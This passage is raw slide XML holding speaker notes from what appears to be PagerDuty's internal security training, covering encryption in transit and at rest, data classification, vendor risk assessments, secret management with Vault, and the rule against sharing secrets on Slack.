          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1114" name="Shape 1114"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>The first is called "encryption in transit"...</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2" name="Shape 1122"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1123" name="Shape 1123"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>The idea is that we want to be sure that if any of our communications are intercepted, they cannot be read. Importantly, we also want to make sure they can't be read in the future even if our keys get leaked. So if someone intercepts our communications now, but doesn't yet have the key to decrypt it, they might store it on the off-chance the do get the key later, then go back and decrypt it when they do. You want to use a technique called "Perfect Forward Secrecy" to prevent that from happening.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Everything at PagerDuty is encrypted in transit automatically, we use HTTPS/TLS for all endpoints, and all other communication is encrypted by IPsec in transport mode by default. You need to try very hard to send something unencrypted around our infrastructure.</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1" name="Shape 1131"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1132" name="Shape 1132"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>The next main use of encryption is called "encryption at rest"...</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0" name="Shape 1140"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1141" name="Shape 1141"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>We want to be sure that if someone gains access to our systems, that they cannot access any data while it’s sitting around in our own infrastructure.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>So we want to be sure that all information is encrypted when it's stored on disk or in S3, etc. You may have heard that your laptops all have "Full Disk Encryption" enabled, this means that your laptops are encrypted at rest. If someone were to yank out the hard disk from your laptop in order to steal information, they wouldn't be able to, since the disks are encrypted.</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9" name="Shape 1149"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1150" name="Shape 1150"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>So what information should you be encrypting at rest and in transit? What’s the most sensitive data we have? (Spoiler alert: it's customer data).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I often hear this statement from developers, that their framework of choice takes care of all the nitty gritty security things for them, so they don't need to understand how they work. I'm here to tell you that that is completely not the case. Rails, Akka, Symfony, whatever you use, you can't just blindly assume your framework or library of choice has you covered. Yes, it's convenient that they do all the heavy lifting for you, but you can't just abdicate your responsibility to understand and be able to repair security issues yourself.</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8" name="Shape 1158"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1159" name="Shape 1159"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>You wouldn’t base64 a password, so don’t store customer data in the clear either.</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5" name="Shape 1175"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1176" name="Shape 1176"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>A quick reminder of our data classification policy. We have three distinct types of data at PagerDuty.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:buSzPct val="100000"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1"/>
              <a:t>General Data</a:t>
            </a:r>
            <a:r>
              <a:t> is anything that is intentionally available to the public. The key being intentionally. If something gets leaked, it doesn't automatically become general data.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:buSzPct val="100000"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1"/>
              <a:t>Business data</a:t>
            </a:r>
            <a:r>
              <a:t> is anything used to operate our business. Examples would be our employee list, payroll information, etc.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:buSzPct val="100000"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1"/>
              <a:t>Customer data </a:t>
            </a:r>
            <a:r>
              <a:t>is any data provided to us by the customer.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Customer data is by far the most valuable and protected data we have at PagerDuty, and is subject to our most stringent security rules.</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4" name="Shape 1194"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1195" name="Shape 1195"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>How we handle data depends on what type of data it is. For example, general data does not need to be encrypted, as it's considered public. All other types of data should always be encrypted in transit and at rest however.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>You can view a more detailed description of our data handling policies on the wiki.</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3" name="Shape 1203"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1204" name="Shape 1204"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>So, customer data should always be encrypted in both transit, and at rest. Always.</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7" name="Shape 1217"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1218" name="Shape 1218"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Our automated tooling takes care of most of this for you, but there are some edge cases where you may need to select a specific option to enable it yourself. Especially if you're using new services or tools in AWS, please make sure they're encrypted. It’s usually just a single click, and is super easy to enable.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>We typically get paged if you create a new unencrypted resource, and your newly created object will likely get automatically terminated and you’ll have to create it again. So save yourself the hassle and always enable encryption.</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8" name="Shape 1228"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1229" name="Shape 1229"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>What about third-parties that we need to give our data to? Do they need to have encryption too? Yes, absolutely! Third-parties need to follow the same rules as us. If we encrypt our customer data but a third-part doesn't, that's just as bad as us not doing it. This is why we perform vendor risk assessments, to make sure that our vendors have the necessary security requirements in place to be able to handle our data. If they don't, then we can't use them.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>So please make sure to get a vendor risk assessment completed before you try and start using a third-party tool.</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8" name="Shape 1238"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1239" name="Shape 1239"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Like I said before, encryption is a huge area, and I only really touched the surface here. So here's some additional reading links if you want to learn more.</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7" name="Shape 1247"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1248" name="Shape 1248"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Alright, next topic is Secret Management.</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7" name="Shape 1257"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1258" name="Shape 1258"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>What does that mean? Well, secret management is all about protecting and auditing access to secrets. We want to make sure that no one evil can look at our secrets, but that if they do we have a record of it. We also want to know who's looking at our secrets, even if they're allowed to.</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6" name="Shape 1266"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1267" name="Shape 1267"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>But what do we mean by "secrets"?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>The best way to manage a secret is to not have one in the first place. But that isn't always possible. A decent rule of thumb is that anything with the words "token", "key", "password", or "secret" in the name should be considered a secret. That doesn't cover all cases, but most things fall under those categories.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Because even though frameworks are great, they are not immune to security issues (Spoiler: No software is immune to security issues). If a new vulnerability is publicly announced, you can't always just sit around and wait for an official patch. You will need the knowledge of how the security vulnerability works so that you can patch it yourself. Because attackers aren't going to wait around, they're going to start exploiting them immediately.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Now, I'm certainly not advocating against using frameworks, you definitely should, I'm merely saying that you should never assume the framework will always protect you.</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8" name="Shape 1278"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1279" name="Shape 1279"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>What we absolutely don't want is secrets hardcoded into our source code. It can be tempting to hardcode things like this, but it's never a good idea. The reason this is bad is that anyone with access to the source code gets access to the secret. Generally, the developers building the software don't need to know the secrets that are used to operate that software. Ideally, you want all that to be automated with humans never even seeing the secrets at all. But at the very least, you want the secrets decoupled from the source code.</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8" name="Shape 1288"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1289" name="Shape 1289"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>So how should secrets be stored? You need a dedicated system for managing them. Just like how you use password managers to manage passwords, you should use a secret manager to manage secrets. We use Vault for secret management at PagerDuty, which allows us to securely store secrets, easily rotate them when necessary, and gives us a full audit log of when they were accessed, and who accessed them.</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9" name="Shape 1299"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1300" name="Shape 1300"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>You don't need to interact with it on the command-line in a terminal, we have a UI for it installed in all our environments so that you can manage it visually instead. We have plenty of documentation about this on our wiki, so check that out if you're interested in the details.</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8" name="Shape 1308"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1309" name="Shape 1309"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>The main takeaway here is that we should always be using Vault to store secrets for our applications or systems. Don't hardcode things or come up with any other strange methods of getting secrets into your applications.</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6" name="Shape 1316"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1317" name="Shape 1317"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>On the subject of secrets, I occasionally see messages like this in Slack: "I need the password for..."</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>We should try and get out of this habit, as it not only assumes that we have a shared password for everything (which obviously isn't the case), but it's subconsciously encouraging passwords to be sent over Slack.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Very rarely is there a "password" for something that needs to be shared. We should all have individual accounts to things so that we have accountability. So the question should really be "I need access to..." instead. Even then, if a secret needs to be shared, it needs to be done the correct way.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:p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5" name="Shape 1325"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1326" name="Shape 1326"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Remember that secrets should never be shared over insecure communication channels. Slack is an insecure communication channel, so is email. If there's a secret that needs to be shared, it should be in Vault, or in 1Password, or some other dedicated secure secret delivery tool.</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3" name="Shape 1333"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1334" name="Shape 1334"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>I'll say it again, because this really is important. </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1"/>
              <a:t>Do not share secrets on Slack.</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3" name="Shape 1353"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1354" name="Shape 1354"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>But what happens if you do it accidentally? As shown in this completely made up and totally not real scenario.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>It can happen, you had something in your clipboard and paste without realizing. By the time you hit enter and spot it, it's too late.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Well, don't panic. We all make mistakes. You're not going to get into trouble. I've accidentally posted secrets in chat tools before, I'm sure most people have. What matters is what you do next...</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4" name="Shape 1364"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1365" name="Shape 1365"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>...you need to let the security team know immediately. We'll walk you through how to rotate the credential and get things back to normal. Now, we're not going to do the rotation for you, we're going to show you how to do it yourself. So don't just think you can pass off the work to us :)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Importantly, we will never name and shame you if you do something silly like paste a password into Slack. Never be afraid to come to us if you've accidentally done something that's not secure. As anyone who's already done this knows, we keep it to ourselves. We will usually do a post-mortem, but you will never be mentioned by name or any other identifier. We all make mistakes, and our job isn't to make you feel bad if you happen to make one too.</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5" name="Shape 1395"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1396" name="Shape 1396"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
